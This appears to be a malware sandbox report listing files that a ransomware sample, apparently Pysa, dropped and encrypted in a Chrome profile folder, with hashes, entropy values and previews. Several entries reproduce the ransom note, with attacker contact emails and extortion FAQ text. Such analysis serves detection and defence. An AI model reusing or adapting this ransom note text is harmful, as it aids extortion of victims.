                  Preview: ...~qW.}........b.;.K;.s...^a..VnV6v.{5......K.......u.....%!...7.W..-..L..:.'.R..7.e........t.#....w....{..j..\........ZZ=..jnq.*.T...b...0.!.Q&nl..V9....e....b@.3..K..x.t...]...0...;..B...&p]..)....J..?=#.R..{.j6.hk..P.-...}p].w.Cq.9.P.....S..L.T.^Z..-.......?D5F.6q_......J.U)...RXa..._K.k.....Dh...ak"].o........}.......d....$......*>{...P.p|Y:.+/".MO...,....W.3.$....Y.").R1v..kp....C..B.y...sI.Wx..$..`..../.m..h.1vQ_Rg.=>vi.}.].E..y.....db....(.@..7......|,w..+.dD.=5...]...E$.w..._4+U.D31..............s'.7....V..g.lE|o...R.V<.O...R..........EK..r...c......kt.a...}\u...G&..f..-...s%}..R......1^..A...Z.Uj...p.Y..x~eWS.R..r...G..w..$......QV..jS...]........"u....S...G{.l...6.x._:u..~z.`..+.D.....u.;.;.X}...,. T'..P87......g...,.)T...F.=....}.~N)..7;..GU...H......n.A.zgU.....u......`..d.S.Y..4#...^...wG9.w..i.8[.w...(...{i2L .C-.........>`tZ.[D.......9cB.B.e......!....B7....p....s.^.g..wg).lU.`..U..6qU...B..&.*.k.....>$l.0.B.\...:...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Floc\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):2132
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLgNDPOmbJ
                  MD5:F5F6CB683017074FC644C8E039F1ED23
                  SHA1:BB512B1BE542FB549444448E5D715BD9B0EF5489
                  SHA-256:6D18BE05DC3A0BFE38098A6AA6BBBED5D79201E74284A476607D8393034966E6
                  SHA-512:D826D55297D01C40684AED444646C1890978B8C177CA8667C9BB646331AAC98C7644A45435003263C807FE0DA3098DB04684CC5320B851DC623CAD59C4B70A73
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_0.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.671443356454286
                  Encrypted:false
                  SSDEEP:192:nO3zCMccLiaq3ONCawbpcGti20hAIh35TD4i1OrSjQcycvZdIYivg0rx:nOjCDasH1VcGtUAIhCv2jDyEYvgG
                  MD5:644CE3176E4D7CA69D19624DD9DAE080
                  SHA1:E7DADD120ADF13845ED94AD0DD67CFB51146E2FA
                  SHA-256:038A588539B396F6BD5CC01760A00CD8FE126B0D3690B834561B801D3D5295BD
                  SHA-512:CA72C081B97DF63C7549CFFD15873C22C116D33715059BEC0B5A01AC84C13B0FA1FF68027DD81BBF2CC8A3AE0D594FCE4690B95E9BD6602474C8EF678FF7CDC2
                  Malicious:false
                  Preview: Jz....J\C.|...q....}.."..h_.S...%^......-s..^..N........@..I.......%.......Z.u..jzjI....Y..I....E..<.:......k0..3t.GGO..\.v...-....B&.7p.w...B.(..%....Gq..@|.D.TL.$1?..@.XQH....K.......F/%*....+.0~.:.2EU..}.zR..........#....n...%...^|..LD..<..R. .;|.h*?.O.........Nw.}....H....yF.).\.!pRWj..._.Ih.O ....A.X.D.8" .R..D$pC.E.......6...2..JR.5.{......h..6...e...J4.."7..G{.<.o.........q.0<d.CL..cu.@-..."...O.K....p.....h4....Z.....rG.....F.V......T..a..V...(\.....?...,f..:........m...,%....Y.[..z..vQ.HADa....r.B.h......h........i.B.A`r#j....0X._...$J....A3..%;O.DQ.wYz..:?.YW~.....g?g..<..w...5#.=..Gu.j;....U....i.]..Wo.4..B..n<...[..vZ.5....k...E..'.........4...s..].<.w.y]......5.5.K......$.yT[#.!...3....QAJt@.~.xG..y0.cv.e...a.Hce>...p`.c.q?J.,.X..K.e.>EO@...3..Cl...........7.C<.HAN%{..)+..6..OT.dO......_l......B..j.g.F...89.~..Qv.....v.i/?...w....)3c...f.u2gN.W.O6.Y8..ef......t7...j...\C....}.y....M.....t....T..4s.......F....m
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998153826755359
                  Encrypted:true
                  SSDEEP:3072:yL9MQkOvGgz0Ot14ocEhVQHXO6yLkUHQ8uCjg76pm3beU5Suc2auF3:yZhdz0Q4HEHQHXoLaGp4J5xaq
                  MD5:16B4FB9019FD1196571B7D668D27CECE
                  SHA1:2E7C60A3497935F4BA9B3CA4A5D8B84F8B4CD24C
                  SHA-256:6924D8E3A978811DA6232FB5869C93692E5752906FD6C29D4C02C3FBFBD0A4B8
                  SHA-512:5AD3B06042AF03A80149BBBD0522DF99F760E01F5C1C04C85D1A08FA26271A03A68FC08A16C855A1A179F133362C093B0C81A2B801C869C8322C0787FEE57104
                  Malicious:true
                  Preview: .3( 4.D...>5.zJ.LI..B....w....[M...6.u.!..Z[..]..9...G..z*.~.&....b".rv.)..2Ohs5[y.]..w~..#x..-d.l...{|@eZ...f..u.~Zb...I.o..t...+D.....rq..s...3&-..e_.E~.s5.l.)}F-H...#...a.{........n... ...(..:..B:h....q....GHW.._1l.?{!....#0......B..Q..*....o..N.|..........q....G.eU.......@...^..G.A4,.\...|..0..{5.e.+.{.H.c.*..b.*..X..]6,o].%X.Q.....5....y.WJ...%..s`.....8[L...V.w...,..XI.?DG..G....6.R..R...I.O.l.QW.x.P.F..?.Lh..H..n*...Am...C......o...J/..m..-...k.#....DD...:..."..........-...9..g../....7.|...]".4.w.f..z........h..0rv.....2qU.j.c.v...|....1..G.Pf.F......Q..`.+.L8A;n..M(....6....].....y..vo.8..K...7{.P|uK..q.....].......ey$u....iLt.\..&..&.ON'Z..9..&F.'..]f.W,..7"....8../..~....o.=yta._..!...r##P0...$..ps{.M......6....o...9.=.po...V....Uu.o.Dy.~..7|~ ..........R..'.].[.^..b]%*....w..p.,O..g.f.V.vA.Q.P.4.j..3k+....6.DL`v0.....0...9.&...1...&.........q..d.]..O......4.B....&....[.L....3.-..*-..0.....E.#...v.jf..l...p..(.C......M
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_2.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.678681532143033
                  Encrypted:false
                  SSDEEP:192:jQTRf2y7i0WMleOo9jS/Gvyohrz6YYwMW6McaQX+LbEbDEPx0+nxKZNq5VNo:jQJzWMle19jAGvy2zTnMW6RANnxKZIVe
                  MD5:7D7B2638342EFFF127908DA054DEA8B1
                  SHA1:D5F26955A16030893CE21FC51309C179AF25EC61
                  SHA-256:483DD163041DA8D73C78FECF7B12192FAD9B6DB0BE3DCBE40FB5417C58C7136F
                  SHA-512:99BB4C1D4B78AB6F4893DC26C32C1EBC0D9C4B27D99FA0459CB6438B7291C62AE9FC991CEF0B4C0AF5897A82D051B7BB0423DA1656A9507C8A12256B66EEB8FC
                  Malicious:false
                  Preview: ...#Y.p.|uC>....T....C8.-*Y.O...?...D...0N>.......l..u.sc.%..@.....-..,.;..lE(?<.a..+..Z.HCA^..S..Z......{...X.7..JDJ.Hy1...&.T...XF..:T_.Z{..S.. ..~....s...q.C.....:.c&@oa.;.}..Z.../...rc.)o..S.8...E........(......o....@..o..3(U%...,....n...o62.;>....{wh..M..[8........@o..+.:...M....giE.V|...c..n.b_!..]/...q......../.h,.NJV.|..x.K.b..*..LD0g>.&^Fh.....z.I.,3..y.B...@.F)..1{...."......Z....$.;.....e..$r.'..:.w.). o.hh.|........S.N....\@.....B...W..N..D2*..p.x...{...'.oX.^.................}-.........#.L..w..Ly.I%9B E.Hn..^...~.A7vR...%.ek.7...gV........@..K:....I.(...]............Hy-.j.@=..@.@..G..Q.L*Mv..B.`Y.......}Q...S...W....N...b_A..i...`EW.twm..GG..v...o..%....;."F.s.N.P....vt.i.p.....*..KB....p.....P.J.k7 .i........mn`......*.....d..1T.....2....q....Z..]]V.@)..M.U..y..........u.....X...@J....!.@e.|...4.`....u%.T.6.,.r...|+m.S4,3...n&}7.C}.".b.&..#.f......FW.6....C...5......k..[.Wh..x...Pe...2..@...T..w....r=..X]......{H...vO..c
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\data_3.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.670802144829263
                  Encrypted:false
                  SSDEEP:192:hI9cGBw/XMwLXpubxvRXQBej8UG5vvkvsWkhs7iJN7hmq3HkH:hsrBoVZubzrj8U68piP3o
                  MD5:77A9B5762628F72BC540531FAF4E2829
                  SHA1:6AA729E412D92A2AD78119FCC0D813DCB253F95C
                  SHA-256:FB6A9820901DD2AE859614C821B6C20989A8BE19447293F60E00E8FB73D8941B
                  SHA-512:D7B247CE85E6D2BFF9DBBF6CFA417E129783D86ABE778BE4CB18FA1839FE555BDCBBB78B6948EDA3D447731ED38850EBFA8F8F1262549E148D84E7049069E545
                  Malicious:false
                  Preview: 5...Q..L..v..?....1...).P.{m9<;.;rX.?k...c...,$yL.\.....W..0@..........S(...P..`m..$i.....7!.5.p.\g.:..w....&c.l..wY..fO]G.f.......4.>.g...a.d..YtC.].)..........>.n...<iE..d:...<E%#..E....U....E..r?...8X.m..Z.O...n..6.. b...f<ImN.KZ....n.......'.'$m..\.~h......_.....i.LR.=].........S..Z..SV..G$......-1.......Xy.Qtw.n..O..q...H5w.S.......g....0.~..0.H..7..h.M..z...."1...aX.....|c......T.../..>.S!.@.U{....u..b..I9...!l....N....._{...S.MC/k.Y.$YF%..V.H.....%9..Z.HD............w..+...g.....-...?w.A`..=.Uj..f...l.{..V..k..A..X.. ...c...O((>r]-..R+.P...}5P...|Y1.]=.2q....b.vC.}..88}......j..Q"3dh..{.K..O/.([..j.i]/...e..~]9{...0.....<D........Yv@D...7.v.d..[.k3...v.A.w.}.=...5u.z5L..Q.....].........F....ir3......D....u..*b....E..V9..y(S(.[/.u............^..{.t.......7..k...A..j`.P...GR.._..;H....V.g.n>.j..WW.|..L..............64....X?..W..d........9...[+.&.J..o........0.<.,z..^dn......v..`.....".$j&.Y..........S....(.o.4).{Z...@...&=N...*.t...
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\GPUCache\index.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):206848
                  Entropy (8bit):7.998012831115974
                  Encrypted:true
                  SSDEEP:3072:f0UPmBzViBhTy7MjAx5tr1z0DUz/D63wRgOU50xUo75D5BWxw8aVhw6M15msut9x:s1pkKRtr10DTKt7v+w8j6K5msutKlM
                  MD5:53B07B815CD7D38BB88C5A3261C0C579
                  SHA1:3CE65DF5627DF46224A858713D986BE00E9A648B
                  SHA-256:6BB2F22DBA03240C33FC59234DC7DF5EB86A3D66D5AC30B5A173E5FAD46ECD26
                  SHA-512:E552BB38B1B3932189FC220A6E0FD27323F83ECE0FA10E3208A1DD8EA51F3752EE9A228565C49BB31252298C020BB7EDA058656F504E1006A14E5AA8D8E6ECF8
                  Malicious:true
                  Preview: .2-Sq._.k.....iC}.E#....k).6b.:dI\?L..{ ..0N.r/...w.EI...*...*.'.l..........}.....BwI%.K...Vt..y.......Q...f@a6rQ.X.fQ..lA..R.!.*...W.!.?d....JB....U..bk-b.P.atT..zE........n..O..m....T....T..&.hR.UZ.^T.b...B.^......3Z..[>.. ..8.s....._..3....._vT.YzE6r#...n.J0.6..D.|.LU.....5*..8....N!..(%x....]X.......-!".J.3.9..Z@.0.4.....({....h".m......;......0..3 Z...I.$z0-...(Y\%H,..........*...U.X#!/=r.6`.[..S....;N{..G'L...B.=.+x..e.%.v.-..Mg..UT.../M.^.82d.'#..O>.v.....km-5.v`}.$[..#.I(;:.\I.2"..-$....u.J..../Eo{j..e#...k.oa..i....&ZQt......k..m$..(..Pv.5V'\M.....R:qS..q'..!#b)<.^..._..8.....O"[...N.{........y..u..A..Qum|......i...\.i...^......).T...G..5Az.;....F%..%.w.\...<.GM..c&...".i....o.Aa.&..@/...IH`|7.......c<D...<.*.}.1. zt5$...}..d....._..l.......3...n..........J@+.x.`Zp.O..\.~r......r.hz....c.....J5..9..Xq....r......N....V^|...}F.b..].$WB\r..G....S.y..p.'...zN..:tUt.d.....ub.l..ly......(^P.O-.-=..^S.....O..:...y.......u6TD.v..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):89088
                  Entropy (8bit):7.993221067747161
                  Encrypted:true
                  SSDEEP:1536:GTMr0XjcOwRCZzV5ueaBQi+iTvbYRjE2YjZN7vBvmsSpeHNgCGWpqKa2RXQR1a:QMr0TNwRIzAQi+iTjRtN7vkJzvWja2pH
                  MD5:7EE80D17FC92A4A0D2AD1B37077C2C7C
                  SHA1:6D36A2B83F1AE75889D8BAA5EFF15F1B0721AFD4
                  SHA-256:32EF550ECEF87787BAAC4228641FA636250813110C554889AD8FB43FCFA23668
                  SHA-512:AE5BAB3E59FBCA163167B6D28F951029DADDB12013B88E2316B619F4CF537B6F4A66369B6E654C6CB9C4C5D9C5DD113957F68C4CBAB3991E7902685FEEDB3C0C
                  Malicious:true
                  Preview: t..M... ....a.......qp.....v...:S..\sI..~a...(|s.."...mi.k[..+)6-n.*..."....P1.`&f.......s.t?V%Zw.fU8..f...}.o......[.#vX3GeaG.....?e~.C.o..$Z.w.G.n.x(..}...L...G...."i.D....w..........1.G...p..S..St+....v.5B.._......l..".....$m....s._...!..8.-......i.<....f.ru.*. .V....r.....8.z....",..*...uR.y..,......Hd....A.=....b....C.\...d....U+..0(~..~$..B-.q..R,R.d~.2.X."..k1@..vS..\.....+.C.<[......!9g.../8zX.2.....a).RV....9...N..A..Y.,.(K....E..K.R..,..G..l`T.. }...!H]._..x........j}.....@.E..0.:...)..CQp..Of.9.L....:..):e.{.w...|..F......O'....^C.g...:XTw...{..p...t.&P<j.C.......~.0-I;^.2...pA.v..s.K..T.......E..b.X.#....8..G_.1.hdng.E...x..\.........-Y...<Y@..Z"....Y.45...XW!..:.r.-.z.v...?..unD..j......t..|......]'4....)p....z......e..+@...S.L.......L.n..W.Z... ..-'.|..c..z!`........wY..7..hm.nu.....E...i..<Y".0.>l..M..l.O($w...yG......H.../s&...D..C./...G..?igX!.C..........;..........fPa.....g.--R...T.+..5J..;.P.......ae2..qT
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Module Info Cache.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):96256
                  Entropy (8bit):7.993372867734695
                  Encrypted:true
                  SSDEEP:1536:BXeJq9Q1H66H5yDRwoQE09avI9puK3dbFuDymX4f+d5f3X1L6FQhA3Q8EB85Bh:IJqQ1HtZBoA4XH5vXN6FkA3xh
                  MD5:03723D9EFCDEAD6260869C1D8297B963
                  SHA1:809F0B3B8E2EDBF34AA6407037C090BA13D0749B
                  SHA-256:9F9C06F0877A6CAEA5EC195F2D5BC6B6A5A2E203C3D48D26385A311CF289603F
                  SHA-512:0149B31F729DEA562654DB90713A0C7FED8BCE628D3F5FEDC5011F47F7DC0692868F294BA1963AAFFB155C527BEFDECB58B2D45E0C17546B70A033A010793DE6
                  Malicious:true
                  Preview: ..I.n....k.......7..H.G....t*],.Vi.@... .91Y9...%.%O,......}..`8..........FgX.$.I..L9HnV;.Y.+.liy..i[g`#|q:..6<.dcT*....S...%V..?..0..Gx......{..|8C.(..f..ZV~.......Ur+.k......R. ..p$.4..".n'.wl.0...X$..(.Z.......Q....P..s.C|..-......$.m.X.....m.tiy.SLV.....?.B.....~va."....X.:.?....).~.O;.....v.,......z...p.sz.}7.$...c.*..|....C+.iE..*.....~B...u....{T.....0.{c.Y.@...t..Y$,..@.T}J...3...,`.8n.7....:..,..m...L.Wa.x.8..0.h..XS..@.:..|..............9..,xKV.9..G..%....I'..$.X.2.@.....r...@....u.bB..xk..*..@..........vR...s..b...GI;a.e.I.qU..y...3....R..J.R.6K"....g.r....[>.C.....T..5..'1.?.+...`z..P....[Q$..r8..`F..O...NhY..,..M<.x.=.. ....Y@...x...AA.Zw...i..3...M..d.2.,..{7~.N.4.....UC.R.ovl....1..>%..&.qW.y..94..n% .....my..d4[.Z ..V.J........Uz......Z)..G.OI.#...>.h%\........6.1~.e.9ng..O.d6oZ....8S...;..HP!..H{...5\..Wz.M.W...@.`*u8.'M.V.....5......A.......G.DMi.P..{B.....q.....}Rq.V.&.%:8.LcL.^>.E.n..o}".C..Gf..........+.m..`.7.
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\PepperFlash\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
